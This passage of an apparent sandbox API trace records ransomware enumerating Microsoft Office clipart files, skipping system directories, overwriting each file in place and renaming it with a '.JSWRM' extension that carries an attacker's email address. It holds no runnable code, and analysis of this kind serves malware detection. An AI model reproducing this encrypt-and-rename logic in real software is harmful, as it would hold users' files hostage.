lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239953.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.502] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.502] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1348, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239955.WMF", cAlternateFileName="")) returned 1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2=".") returned 1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="..") returned 1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="...") returned 1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="windows") returned -1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="recovery") returned -1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="perflogs") returned -1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="documents and settings") returned 1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="system volume information") returned -1 [0088.502] lstrcmpiW (lpString1="J0239955.WMF", lpString2="msocache") returned -1 [0088.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239955.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.502] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239955.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239955.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0088.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239955.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239955.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239955.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0088.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0088.503] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.503] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.503] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239955.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.503] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4936) returned 1 [0088.503] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.503] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1340) returned 0x205850 [0088.503] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1340, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1340, lpOverlapped=0x0) returned 1 [0088.505] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.505] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1340, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1340, lpOverlapped=0x0) returned 1 [0088.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.505] CloseHandle (hObject=0x314) returned 1 [0088.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0088.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0088.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0088.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0088.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0088.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.506] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239955.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239955.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0088.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.506] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1720, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239965.WMF", cAlternateFileName="")) returned 1 [0088.506] lstrcmpiW (lpString1="J0239965.WMF", lpString2=".") returned 1 [0088.506] lstrcmpiW (lpString1="J0239965.WMF", lpString2="..") returned 1 [0088.507] lstrcmpiW (lpString1="J0239965.WMF", lpString2="...") returned 1 [0088.507] lstrcmpiW (lpString1="J0239965.WMF", lpString2="windows") returned -1 [0088.507] lstrcmpiW (lpString1="J0239965.WMF", lpString2="recovery") returned -1 [0088.507] lstrcmpiW (lpString1="J0239965.WMF", lpString2="perflogs") returned -1 [0088.507] lstrcmpiW (lpString1="J0239965.WMF", lpString2="documents and settings") returned 1 [0088.507] lstrcmpiW (lpString1="J0239965.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.507] lstrcmpiW (lpString1="J0239965.WMF", lpString2="system volume information") returned -1 [0088.507] lstrcmpiW (lpString1="J0239965.WMF", lpString2="msocache") returned -1 [0088.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0088.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239965.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239965.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239965.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0088.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239965.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239965.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239965.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0088.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0088.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239965.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.507] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5920) returned 1 [0088.508] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1720) returned 0x205850 [0088.508] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1720, lpOverlapped=0x0) returned 1 [0088.510] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.510] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1720, lpOverlapped=0x0) returned 1 [0088.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.510] CloseHandle (hObject=0x314) returned 1 [0088.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0088.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0088.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0088.510] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0088.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0088.510] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.510] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239965.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239965.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0088.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0088.511] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x154c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239967.WMF", cAlternateFileName="")) returned 1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2=".") returned 1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="..") returned 1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="...") returned 1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="windows") returned -1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="recovery") returned -1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="perflogs") returned -1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="documents and settings") returned 1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="system volume information") returned -1 [0088.511] lstrcmpiW (lpString1="J0239967.WMF", lpString2="msocache") returned -1 [0088.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239967.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239967.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239967.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.511] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.511] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0088.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239967.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239967.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0239967.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0088.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0088.512] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0088.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.512] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.512] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239967.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.512] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5452) returned 1 [0088.512] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.512] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1540) returned 0x205850 [0088.512] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1540, lpOverlapped=0x0) returned 1 [0088.515] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.515] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1540, lpOverlapped=0x0) returned 1 [0088.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0088.515] CloseHandle (hObject=0x314) returned 1 [0088.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0088.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0088.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0088.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0088.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0088.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0088.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0088.516] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239967.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239967.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0088.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.516] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecdfcbb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecdfcbb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecdfcbb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0239973.WMF", cAlternateFileName="")) returned 1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2=".") returned 1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="..") returned 1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="...") returned 1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="windows") returned -1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="recovery") returned -1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="perflogs") returned -1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="documents and settings") returned 1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="system volume information") returned -1 [0088.516] lstrcmpiW (lpString1="J0239973.WMF", lpString2="msocache") returned -1 [0088.517] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0088.517] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0239973.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 